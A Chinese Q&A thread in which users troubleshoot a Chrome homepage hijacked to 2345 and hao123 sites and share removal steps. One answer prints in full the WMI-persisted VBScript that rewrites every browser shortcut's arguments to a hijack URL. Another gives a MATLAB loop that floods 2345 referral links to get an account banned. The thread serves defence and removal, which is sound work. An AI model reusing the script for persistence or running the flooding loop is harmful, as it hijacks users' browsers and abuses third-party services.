chrome 主頁被劫持，每天首次打開chrome都會進入2345的界面，求助解決辦法？

01-05

chrome主頁似乎被劫持，每天開機第一次啟動，Chrome都會打開2345的界面。為解決此問題，我已經查閱諸多解決方案發現均無效。嘗試了如下手段：
一、查看快捷方式是否被修改，結果並無異常，如下圖！
二、修改Chrome設置，修改前「啟動項--打開特定網頁或一組網頁」，選項裡面是有2345的網址的，下方截圖時已經刪除，但每次刪除後，第二天打開還是會有該網址。

三、有人說chrome相應目錄會有old_chrome.exe替換掉chrome.exe，或者說chrome.exe.exe的影響，我的電腦均沒有，也排除這一情況。
四、註冊表修改的方法，查找註冊表搜索http://2345.com，確實搜到一項，不計後果刪除後，第二天打開還是無效，現在搜索註冊表http://2345.com已經沒有相應的項。
五、參照鏈接IE以及其他瀏覽器主頁被劫持到www.2345.com/?kunown的解決辦法，利用WMI工具嘗試修改，並沒有找到"unknown_filter"，如下圖。
至此，已經嘗試了網上基本上搜索到的大部分方法，但還是沒能解決問題。
求助高手指導！

小馬激活也會造成 Chrome 首次打開時打開 http://2345.com。

解決方法如下：

1、C:WindowsSystem32driversUMDFjihuo.dll；

2、C:WindowsSystem32driversLHPLKernel.sys；

3、C:WindowsSystem32LHPLKC.dat；

4、C:WindowsSystem32driverssurak.sys。

上述文件，先改名，然後重啟刪除。

該操作並不影響激活效果。

---------2016-3-3更新如下----------

一、建議遇到此問題的大家先用殺毒軟體掃描C盤，不要使用半吊子的360、電腦管家和我以前有提到的火絨，也不要使用國內流氓的殺毒軟體如瑞星、毒霸等，建議用卡巴斯基等收費殺毒軟體（可以試用的）。

原因在於：

1.我的電腦之前通過如下方法解決了首頁被劫持問題後，沒有殺毒，今天殺毒殺到兩個木馬。

2.劫持首頁已經是黑產的一部分了，因為有利可圖所以有無數人變著法地劫持，道高一尺魔高一丈，已經出現專為劫持首頁的病毒，我們不知道除了這個表面的劫持動作外是否還有後台的其他動作。

二、如果一定要自己動手，建議不要用半吊子的方法來查殺，直接看這個解答為什麼 Chrome 瀏覽器的主頁會被篡改為 hao123 ？遇到這種情況需要如何進行修復？ - dll 其他方法包括我的方法基本都是治標不治本的，而且大家的現象都不太一樣。另外這個回答里提到的工具大部分是微軟官方可以找到的。

---------2015-5-5更新如下----------

更新利用自啟動劫持的情況，現象有：

1.瀏覽器被自動添加到快速啟動欄（或桌面）並被修改主頁，刪除快速啟動欄圖標重啟電腦後無效。

2.瀏覽器只在第一次啟動時打開特定頁面，其餘時候表現正常。

原因是：劫持者使用系統任務計劃或者自啟動程序，在開機或其他特定時間啟動劫持程序（一般是批處理，也可能是註冊一個服務來完成劫持）。劫持程序可能會在運行後刪除自身以防止被發現，也可能運行後生成另一個劫持程序進行劫持操作防止被發現（我都遇到了）。

解決辦法：1.運行msconfig，找到系統自啟動項，禁用陌生的自啟動項。都陌生的，請禁用全部自啟動項，如果解決了再一次解禁一部分自啟動項來定位有問題的自啟動項。

2.運行taskschd.msc打開任務計劃程序，定位問題方法同上。

3.如果是被註冊成系統服務的，請用殺毒軟體查殺，自己如果查錯了可能會造成很麻煩的後果。想自己動手的注意查看服務項名稱重複的和服務項介紹很少的，劫持首頁的服務項會偽裝成系統原生服務。

4.如果有一個好工具，請直接監視系統目錄全部改動，直接定位到劫持程序的位置刪除之。

---------原答案如下----------

剛剛解決了這個問題，多謝 @空月提供的鏈接，多謝大神 @想了好久在另一個問題里提供的答案，問題是 chrome 主頁被篡改為hao123？技術宅帶你層層深入破之 - dll 。這裡已經講得很清楚了，我只是按照這裡的原理提供一個大家看得懂的解決方案。

解決的問題是：Chrome IE Firefox或者其它瀏覽器首頁被篡改且無法通過修改主頁的方式修改回來。

解決步驟：

有一部分人只是桌面的快捷方式被篡改，請右鍵桌面上的快捷方式查找到文件的安裝目錄，嘗試從安裝目錄雙擊啟動瀏覽器，如果首頁正常說明是快捷方式的問題，刪掉快捷方式重新生成一個快捷方式到桌面就解決了。
如果上述未解決，請嘗試從任務管理器裡面運行瀏覽器程序，如果首頁仍然被修改說明瀏覽器程序有問題，建議重新安裝。
如果用任務管理器運行後首頁就恢復正常了，說明問題很可能跟explorer進程有關，那麼先看C:Windows下面的explorer.exe程序有無異常，比如修改日期是否異常，有問題的話建議找相同系統的電腦上拷貝一個explorer.exe文件，或者直接重裝系統。
如果explorer.exe也無問題，那麼看進程鉤子有無異常，一般是DLL文件出問題，不用會看代碼什麼的，我是用火絨軟體裡面的「火絨劍」功能查看的，用鉤子掃描掃描explorer.exe進程，我在目標位置這一欄會有一條指向2345.lc文件的，按著這個路徑在電腦找到這個文件並刪除即可。
如果以上都未解決，那麼看有沒有奇怪的自啟動項，或者是奇怪的進程，禁用或關閉後試試。

我和你的問題一樣，猜測是用訪問什麼網站的時候有js惡意代碼，本地植入系統進程，然後搶注實現的三無後門。用process monitor 真能把你看瘋，果斷跳過。

樓主可以試試看ComboFix(pixnet.net 的頁面)

關閉所有防毒軟體(包括Windows Defender),下載ComboFix至桌面 ,執行 ComboFix 掃毒。
掃瞄時不要執行其他程式或點擊 ComboFix視窗。
(ComboFix掃毒約10 -20分鐘,唔使裝"修復主控台程式")
完成掃瞄後,ComboFix 報告會自動彈出。

上面我懶得分析去找源頭了，這個和運營商沒關係，理由是我不在國內。

2345的推廣真是為了錢什麼都幹得出來

deepweb還真不能隨便去啊sigh

最後祝你的瀏覽器早日康復，這個問題我會follow

---

最後想了個以其人之道還治其人之身的方法，比較損，直接寫了一段代碼，刷他個而已訪問之後，他的號就被禁了

n = 1; while n&<500 n=n+1; b = urlread("http://www.2345.com/?12562"); a = urlread("http://www.2345.com/?22174"); if (mod(n,100)==0) n end end

不要問我為什麼是matlab因為剛好做項目開著。。

前幾天剛中了一招，立刻修改了Chrome主頁設置和註冊表，但直到今天才得以真正解決。打開桌面上的Chrome快捷方式沒有問題，但是工具欄的快捷方式反覆解鎖、鎖定，打開都是2345網址導航流氓主頁。最後的解決方法是：1.搜索「quick launch」關鍵字，找到修改時間最新的文件夾，進去發現正常快捷方式被隱藏，鳩佔鵲巢的是修改過的lnk。不用說，直接刪掉惡意文件，恢復舊主。2.開始菜單記憶的常用lnk也被惡意修改。想改回來，發現沒有許可權，懶得再弄，直接刪掉。3.重新搜索chrome.lnk，發現反覆解鎖、鎖定時留下不少餘孽，刪掉。4，修改hosts和防火牆設置，永絕後患。

歸納起來，2345的流氓技術主要有如下一些：

1.修改註冊表、lnk文件，這個眾人應該都比較熟悉了，仔細清理無遺漏即可；

2.WMI列表駐留，算是高級手段，但被討論的次數不少了，無需多說；

3.修改Chrome擴展中的js腳本，注入惡意內容；中招者有必要注意"Users用戶名AppDataLocalGoogleChromeUser DataDefaultExtensions"文件夾，裡面都是擴展，每個擴展文件夾內（包括子文件夾）的所有background.js文件都要仔細檢查，被注入了惡意代碼的擴展最好重裝。

有微軟的工程師說過，2345的手段比較隱蔽，只有在Win操作系統安全機制有明顯改進的情況下才可能真正受到抑制。所以我覺得，多藉助系統的許可權控制、安全軟體的不受歡迎程序檢測功能、HIPS軟體等強力手段，才能真正打死這隻過街老鼠。

==========================================================================

人蠢是沒有辦法治的。昨天晚上下載一本電子書，NOD32沒有任何反應的情況下，桌面突然多出了一個"淘寶網.exe"，系統托盤出現「2345在線安裝工具」的提示，於是明白竟然又掉坑裡了，所以還是有必要補充一點。

這一次，打開chrome瀏覽器，主頁被篡改成了「http://www.2345.com/?26510」。查看瀏覽器設置、註冊表和快捷方式，無任何問題；background.js腳本和WMI也無任何異常。於是就傻眼了。

在 @王金耀朋友回答的啟發下，將chrome.exe重命名為1.exe，打開後主頁是自己設置的baidu，於是判斷，這次問題也可能出在隱藏的病毒文件上。使用Process Explorer對chrome.exe進行查看，發現這些流氓網站還是喜歡互相借鑒的：

對於Win10 64位系統，Ollydbg的運行似乎有些問題，於是指望不上它來尋找兇手了。那麼，如何

才能看穿流氓所做的一切呢？在線程序行為分析是個好東西，藉助於金山火眼，對昨天下載的「exe電子書」進行檢測，答主發現該程序在系統內創建了一堆文件：

經過系統內的搜索，答主發現系統目錄下的其它文件要麼已經不存在，要麼並不是由該程序創建，內容也無可疑之處（那幾個inf文件），只余那個MsImedia.sys驅動程序；至於臨時文件，答主直接Ctrl+A，Shift+Del，一概清理。

找到這個MsImedia.sys之後，首先賦於admin用戶組完全控制的許可權，然後刪除，提示正被被system使用；於是，藉助於Autoruns這款工具，在「驅動」選項卡找到該項目，右鍵刪除；重啟後，主頁恢復正常。刪掉這個惡魔的本體之前，再看看其醜陋的面目吧：

偽裝的很像是系統文件？我是Win10系統，怎麼會有你Win7的自帶驅動？另外，創建時間是很難改的。

以上才是這個程序的主子，祝你們早日倒閉。

chrome 主頁被篡改為hao123？技術宅帶你層層深入破之 - dll

這個就是參考答案

我又發現一個新的情況，作爲前面各個答案的補充：

仍是首先看regedit以及「程序」或「桌面」的啓動項裏有沒有http://2345.com或者itiankong（打開時先是itiankong這個網?，隨後被自動跳轉到2345）的鏈接，有的要刪除。

排除完以後發現仍然新開瀏覽器時被劫持。後來發現是windows下方的任務欄鎖定裏的瀏覽器被改了，而菜單啓動欄並沒有被改。（因爲我把ie、firefox、chrom都鎖定在屏幕下方的任務欄了。）把這幾個快捷啓動解鎖，重新在任務欄打開，這時沒有劫持，再重新鎖回下方的任務欄，好了。

我是更新aslocal中招的.

結果發現ie 和chrome 的主頁同時被篡改。設置里正常，註冊表裡也正常

用ollydbg 打開調試，看載入的dll 無異常，同時主頁沒有被劫持~

修改iE，chrome.exe 的名字後也無劫持。

懷疑是某dll搞得鬼，用everything 查找.dll 發現一個當日創建的AlDownHelper.dll，刪不掉（提示在資源管理器中打開）用autorun看了下，果然在啟動項里，在註冊表裡刪除，重新啟動後就正常了.

上個月我的主頁也被劫持了，每次打開強制跳轉360導航。

於是我開始百度，發現了這樣一篇文章：

解決近期360劫持瀏覽器問題_chrome吧

我嘗試使用這個帖子所提供的方法去操作，發現沒有用。

但是，我同時也發現了罪魁禍首，雖然跳轉的是360導航，但這並不是360安全衛士乾的，而是新版的魯大師（當然，這貨還是360旗下的），於是卸載魯大師，問題解決。

你可以按照該帖的辦法去操作，查看一下進程模塊中的廠商，定位流氓軟體，並卸載，可能可以解決。

怎麼沒有嘗試一下排除插件擴展？

在地址欄打開：chrome://extensions/

然後看看有沒有裝了什麼可疑的插件

2345惡意腳本發作的原理分析的具體操作請參考Gemini的一篇博客

不過我按照作者的說法下載了VMTool似乎不管用，沒有檢索到unkown的選項

（原創）如何手工去除http://www.2345.com/?kunown惡意鏈接！_Gemini_新浪博客

然後老外寫過一篇文章，大家可以參考

Remove 2345.com homepage (Virus Removal Guide)

剛解決這個問題，我的情況是直接查看快捷方式指向是沒錯的，但是使用ProcessExplorer查看chrome.exe發現含有指向http://2345.com的參數。

解決方法如下：

1. 打開regedit，搜索Mslmedia，刪除

2. 重啟

3. 打開C:windowssystem32drivers，找到Mslmedia.sys刪除

4. 假如上一步刪除不了，右鍵文件點擊「屬性」-&>"安全"-&>"高級"-&>"所有者更改"，輸入Administrators，確認。然後「編輯」Adminitrators的許可權為「完全控制」，確認。再刪除。

慚愧的說，樓上的我大都試了，各種改hosts、看快捷方式目標、regedit、msconfig，對於一個半小白來說費老勁了。

最後是360幫我解決的問題。。。

http://bbs.360safe.com/thread-6324009-1-1.html

這是我重啟後首頁劫持問題已經解決後的殘餘項掃描結果。看來是中了iwebar木馬，還有一大堆亂七八糟的dll。

不得不說同行是冤家，流氓對付流氓果然專業。

剛剛遇到這個問題，hao123實在是賤的不行，這個改法殺毒軟體怎麼都不可能找的出來。

我終於解決了，我的ie快捷方式被定位到了http://hao.mark008.com/2345.html，然後開ie就去了2345，參考前面大神的資料用process explorer查看explorer.exe，發現了一個可疑dll，cqsshelper.dll，在一個xygame的文件夾里，搜註冊表發現在一個yxtools的鍵值下，清除此鍵值，重啟，清除cqsshelper.dll以及其所在文件夾，世界重要清凈了。

刪了快捷方式,重新建 ,這個方法親測,有效.

主頁被劫持的方法我也不是太清楚，但是造成的後果我可是表示深深的無奈。

那種感覺怎麼說，就像「一起吃香蕉和冬棗」。（不知道的私信我，或者知乎搜索哈哈哈）

答主嘗試了各種方法，歷經兩天的實踐終於找到了問題的關鍵，希望對題主和其他有困擾的同學有一些參考~

首先，檢查一下Chrome的主頁設置，基本上沒有什麼問題。

你看，沒什麼毛病

然後到chrome的安裝目錄，直接雙擊打開chrome程序，沒有問題。

然後檢查快捷方式。

因為習慣於把chrome固定到任務欄上，一般使用的時候都是點擊任務欄圖標的，但實際上這只是一個快捷方式。

右鍵任務欄chrome圖標-&>右鍵Google Chrome-&>屬性，就會彈出該快捷方式的屬性窗口。發現快捷方式的目標鏈接已經被修改，多加了一個啟動參數：

C:ProgramFiles(x86)GoogleChromeApplicationchrome.exe"http://hao643.com/？r=gggggm=e16 (稍稍修改了一下跳轉鏈接)

題主說無異常的話估計是看了桌面快捷方式的屬性，無異常的圖標打開後的主頁應該不會是2345的網站。

題主可以把它固定到任務欄

從這個屬性中看，應該就會發現了~

然後刪除多餘啟動參數

發現：哎~，好了，很開心。重啟一下，依然是好的。

解決了問題，合上電腦開開心心出去吃飯。等一段時間回來後，打開電腦。

主頁又被修改了，我真的是。。。

在這之後，為了解決問題用了許許多多的殺毒軟體，清理工具等等。測試後，過一段時候回來依舊如故。當時答主的內心真的是萬馬奔騰。（是羊駝）

於是下定決心，不解決這個問題我就不搞學習，哼~

-----------------------------------------我是分割線-----------------------------------------

分析原因：

系統里所有跟瀏覽器的快捷方式都被修改，加了一個啟動參數導致每次被啟動時候都會跳轉到這個網址。除了任務欄快捷方式之外，開始菜單中跟瀏覽器有關的所有快捷方式都無一倖免。

各種解決辦法（可能與上文有重複）：

手動刪掉所有快捷方式中，這個方法治標不治本，本來以為這樣可以解決了，結果隔了一段時間，或者重啟系統之後，所有快捷方式又會被惡意修改。
在註冊表中搜索所有跟hao123相關的內容，然後刪除，但是問題仍然存在。
用Everything搜索本地所有跟hao123相關的文件和文件夾，但是刪除之後仍然沒有解決問題。
最後找到了題主說的的方法，但是在WMI event viewer中找不到文中所說的_EventFilter:Name=」unown_filter」
重裝chrome，結果雷同。
把所有chrome快捷方式設為只讀，但是發現一段時間之後還是被惡意修改了。

現在怎麼辦，能半途而廢嗎，不好意思

決定自己來監控進程。工具是這個：ProcessMonitor。

鏈接就先不放了，下文會說明原因滴~

菜單欄 Filter-&>filter，把 chrome的快捷方式路徑 添加到監視中：

注意修改這兩個東西哦~

然後OK運行

這個時候盡量不要進行多餘操作，會多出很多進程，到時候不好找。

Ps：由於此流氓進程太過陰險，運行一次間隔時間會相當長，我也是等待了將近好幾個小時才找到了真兇。所以我並不建議大家像我一樣死磕，浪費時間呀！！如果你真的想一探究竟，私信我，我發給你喲~

這個元兇如上文所說，我已經刪除了，所以我找了個類似截圖給大家看。

沒錯，就是這個罪魁禍首，就是這個叫scrcons.exe的程序在修改chrome的快捷方式

百度之，噗~，流氓軟體的常用招數：三無後門

（「三無」後門的核心就是WMI中的永久事件消費者ActiveScriptEventConsumer）

但是同上文所說，用WMI Event Viewer查看WMI事件，並未在root/subscription裡面找到可疑項。

但是絕對是這個問題無疑！

最後幾番查找，終於在rootCIMV2裡面揪出了真兇。

首先打開WMI Event Viewer，點擊左上角工具欄中的Register for Events按鈕，默認就會連接到rootCIMV2，直接點兩次OK即可。

有些人的問題會是在這裡，但是新的流氓軟體好像知道了這個，所以我和題主第一次並未發現異常。

但是換湯不換藥，他也只是修改了路徑而已。

修改路徑如圖：

雙擊ActiveScriptEventConsumer.Name=」VBScriptKids_consumer」，彈出屬性頁面：

你就會發現元兇原來是它— ScriptText：

這個腳本定期就會被系統調用一次，所以就算手動把快捷方式的參數清空，隔一段時間之後又會重新被改回來。

上面的VB腳本是用冒號作為分隔符，把一段程序寫成了一個語句。

為了便於理解，就把這段腳本重新排版了一下：

On Error Resume Next Const link = "http://hao643.com/？r=gggggm=e16"（劫持鏈接） Const link360 = "http://hao643.com/？r=gggggm=e16"（劫持鏈接） browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"


lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UserschenxhDesktop,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UserschenxhAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UserschenxhAppDataRoamingMicrosoftWindowsStart MenuPrograms"
browsersArr = split(browsers,",")

Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr

  oDic.Add LCase(browser), browser

Next

  lnkpathsArr = split(lnkpaths,",")

Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) "." fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next

可以看到，這段腳本就是遍歷所有快捷方式目錄下的所有瀏覽器的快捷方式，然後重新給快捷方式加上啟動參數。

然後怎麼辦？刪刪刪！

右鍵這個，最後一項，刪除！

（Ps：忘了說了，記得剛開始用WMI的時候就以管理員模式運行，這樣刪除的時候就不會提醒沒有許可權了~）

到了這裡，我終於解決了這個大麻煩。心情舒暢，所以就來知乎分享一下嘍，哈哈哈。

這也告訴了我們，以後還是使用良心軟體，不然這樣的流氓真的是防不勝防~

360主頁修復！快整得奔潰了！謝謝360！

（然後把360卸載了..對不起...）

說一個不是辦法的辦法吧，把谷歌快捷方式刪掉，打開谷歌所在文件夾，找到chrome.exe，右擊重命名，隨便命名一個。

補充回答：在電腦裝了一個360，然後清除木馬就把這個問題解決了。額，我對360一個大寫的服……

——————————————

本頁所有方法都嘗試了，依然無法解決，我是嚴重強迫症，感覺快被2345治好了呢，呵呵！

終於傳到了他們是怎麼乾的。。。

傳輸門：

http://wangpai.2345.cn/thread.php?fid=12pid=2620313mail20131025